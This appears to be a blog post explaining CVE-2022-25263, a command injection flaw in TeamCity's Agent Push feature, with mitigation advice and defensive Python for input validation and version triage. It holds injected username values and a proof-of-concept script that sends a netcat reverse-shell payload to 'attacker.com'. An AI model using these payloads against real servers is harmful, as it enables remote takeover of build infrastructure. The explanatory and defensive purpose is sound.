JetBrains TeamCity is a popular Continuous Integration (CI) and Continuous Delivery (CD) server that helps developers automate their build, test, and deployment pipelines. If you use TeamCity for your development workflows, it’s crucial to keep an eye on security updates. One notable vulnerability, CVE-2022-25263, affected versions of TeamCity released before 2021.2.3. In this post, let's break down what this vulnerability is, illustrate how it can be exploited (with code), and provide steps to protect your own TeamCity instance.
What is CVE-2022-25263?
CVE-2022-25263 is an OS command injection vulnerability. It means that in certain conditions, an attacker could trick TeamCity into running system commands on the server. This vulnerability specifically lives inside the Agent Push feature, which administrators use to push and configure new build agents.
To be precise, the Agent Push feature had a flaw in how it handled user-supplied fields (like configuration or connection parameters). If malicious input is provided, TeamCity would pass it directly to the operating system shell without properly checking or escaping it. This opened the door for attackers to execute arbitrary commands, which could quickly lead to compromise of the entire server.
How Does the Attack Work?
To exploit CVE-2022-25263, an attacker needs access to the TeamCity web interface with enough permissions to configure Agent Push (usually available to admins). When an admin configures (or reconfigures) agent deployment, some fields—such as "Username" or "Host"—were not safely sanitized. Commands injected here would run with the privileges of the TeamCity server process.
Visualizing the Attack
Suppose there’s a field for the Username in the Agent Push configuration. Instead of a normal username (like teamcity-agent), an attacker could enter something malicious, such as:
teamcity-agent; whoami; cat /etc/passwd
This input gets inserted into a system command that looks something like:
ssh teamcity-agent@host
But with the malicious input, it becomes:
ssh teamcity-agent; whoami; cat /etc/passwd@host
The shell treats each semicolon as a command separator, so after the ssh call it will:
- Execute whoami (prints the current user)
- Execute cat /etc/passwd (prints the system's user list)
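To make the mechanism concrete from the defender's side, here is an added Python illustration (not TeamCity's code; the field names and the "ssh user@host" command shape come from this post, while the regexes, class and function names are assumptions made for the example). It contrasts the flawed string-interpolation pattern with an allowlist-validated argv list that is never parsed by a shell, and the accepts() helper is the kind of check whose rejections are worth writing to an audit log:

```python
import re
import shlex
import subprocess
from typing import List

# Added illustration, not TeamCity's own code. The field names ('username',
# 'host') and the "ssh user@host" command shape are taken from the post;
# the regexes, class and function names are assumptions made for this example.

# Allowlists: the first character must be alphanumeric, so a value can never be
# parsed by ssh as an option (one starting with "-"), and the rest is a
# conservative character set that contains no shell metacharacters.
USERNAME_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9_.-]{0,31}")
HOST_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9.-]{0,252}")


class InvalidAgentPushField(ValueError):
    """Raised when a form field fails the allowlist check."""


def vulnerable_command_line(username: str, host: str) -> str:
    """The flawed pattern this post describes: the raw field is interpolated
    into a string that is later handed to /bin/sh. Shown for contrast only."""
    return f"ssh {username}@{host}"


def shell_would_split(command_line: str) -> List[str]:
    """Tokenize the string the way a POSIX shell would, so the reader can see
    that ';' becomes a separate command-separator token rather than part of
    the username."""
    lexer = shlex.shlex(command_line, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return list(lexer)


def validate_field(name: str, value: str, pattern: "re.Pattern[str]") -> str:
    """Reject anything outside the allowlist instead of trying to escape it."""
    if not pattern.fullmatch(value):
        raise InvalidAgentPushField(f"{name} contains disallowed characters: {value!r}")
    return value


def safe_ssh_argv(username: str, host: str) -> List[str]:
    """Hardened form: validate each field, then build an argv list. Executed
    with subprocess.run(argv) (shell=False, the default), the arguments reach
    ssh verbatim and no shell ever parses them."""
    user = validate_field("username", username, USERNAME_RE)
    target = validate_field("host", host, HOST_RE)
    return ["ssh", f"{user}@{target}"]


def run_agent_push(username: str, host: str) -> subprocess.CompletedProcess:
    """Launch the validated command without a shell (not exercised by the tests)."""
    return subprocess.run(safe_ssh_argv(username, host), capture_output=True, check=False)


def accepts(username: str, host: str) -> bool:
    """True if both fields pass validation; a False result is what an audit
    log entry for a rejected Agent Push submission should be keyed on."""
    try:
        safe_ssh_argv(username, host)
        return True
    except InvalidAgentPushField:
        return False
```

The design choice worth noting is that the fix is not better escaping: the hardened path rejects out-of-allowlist input outright and then passes an argument list to subprocess.run without shell=True, so there is no shell left to interpret a semicolon even if validation were later loosened.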
Attack Example: Proof-of-Concept Code
Here is an example exploit written in Python, which simulates what an attacker would do if they had access to the web interface (assuming no server-side sanitization):
import requests

# Base URL of TeamCity Server
url = 'http://teamcity.local:8111'

# Authentication cookies or headers (fill in with your valid session)
auth_cookies = {
    "TCSESSIONID": "abcdef123456789"
}

# The payload injection - notice the semicolons to break into the shell
malicious_username = 'attacker; nc attacker.com 4444 -e /bin/sh; #'

post_data = {
    'username': malicious_username,
    'host': 'agenthost.local',
    'other_config': 'value'
}

# Attempt to push a new agent with the malicious username
response = requests.post(
    f"{url}/admin/admin.html?item=pushAgent",
    cookies=auth_cookies,
    data=post_data
)
print(f"Exploit sent (HTTP {response.status_code}), check your listener for shells")
> Note: Never run this code against systems you don't own or manage! This is for security awareness only.
With this exploit, attackers could:
- Read sensitive files (cat /etc/passwd, /var/lib/teamcity/config/database.properties, etc.)
- Use the compromised server as a pivot point into corporate networks
- Disrupt CI/CD operations by deleting build artifacts
This level of access is especially dangerous because TeamCity often runs with high privileges and access to build artifacts, secret environments, and sometimes deployment keys.
Want to verify or read more about this issue? Check these sources:
- JetBrains Advisory: Security Updates in TeamCity 2021.2.3
- NVD Entry for CVE-2022-25263
- Exploit-DB Entry (if available):
- GitHub Search for PoC Code
How to Fix It
JetBrains fixed this issue in TeamCity 2021.2.3 and later. If you’re running an older version—it is time to upgrade now! Here’s what to do:
1. Upgrade TeamCity
Download the latest version and update your server.
2. Harden Permissions
Restrict who can access the Agent Push feature. Only trusted administrators should have this permission.
3. Monitor Server Logs
Watch for suspicious activity, such as unexpected agent deployments or unusual system command executions.
4. Network Segment Your CI/CD
Keep the TeamCity server on isolated networks, where only necessary developers or automation can access it.
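For the upgrade step, an added Python helper (not a JetBrains tool; it assumes the dotted numeric version strings quoted in this post and the fixed version 2021.2.3 stated above) that classifies inventoried server versions. It compares numeric tuples rather than strings, so that a version such as 2021.2.10 is correctly ranked after 2021.2.3 instead of before it:

```python
import re

# Added example, not JetBrains' tooling. Assumes TeamCity's dotted numeric
# version strings as quoted in this post (e.g. "2021.2.2", "2021.2.3").
FIXED_VERSION = "2021.2.3"  # first release containing the fix, per the post

_VERSION_RE = re.compile(r"\d+(\.\d+)*")


def parse_version(version):
    """Turn '2021.2.10' into (2021, 2, 10). Numeric tuples compare correctly,
    whereas plain string comparison would rank '2021.2.10' below '2021.2.3'."""
    cleaned = version.strip()
    if not _VERSION_RE.fullmatch(cleaned):
        raise ValueError(f"unrecognised version string: {version!r}")
    return tuple(int(part) for part in cleaned.split("."))


def is_vulnerable_to_cve_2022_25263(version):
    """True for every version released before the fixed one."""
    return parse_version(version) < parse_version(FIXED_VERSION)


def triage(versions):
    """Map each inventoried server version to a verdict an admin can act on.
    Unparseable strings are flagged rather than silently treated as safe."""
    verdicts = {}
    for v in versions:
        try:
            verdicts[v] = "upgrade" if is_vulnerable_to_cve_2022_25263(v) else "ok"
        except ValueError:
            verdicts[v] = "unknown-version"
    return verdicts


if __name__ == "__main__":
    # Constructed inventory, not real hosts
    for version, verdict in triage(["2021.2.2", "2021.2.3", "2022.04", "beta"]).items():
        print(f"{version:>10}: {verdict}")
```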
Conclusion
CVE-2022-25263 in JetBrains TeamCity is a reminder of the risk posed by OS command injection vulnerabilities in tools at the heart of software development workflows. If you manage a CI/CD server, always apply updates promptly, restrict powerful features like agent push, and pay close attention to user input validation.
Stay safe. Patch your TeamCity. And always double-check what your servers are running.
---
*Do you want a deeper dive into the technical fix, or guidance for post-exploitation forensics? Leave a comment below!*
Timeline
Published on: 02/25/2022 20:15:00 UTC
Last modified on: 03/08/2022 17:31:00 UTC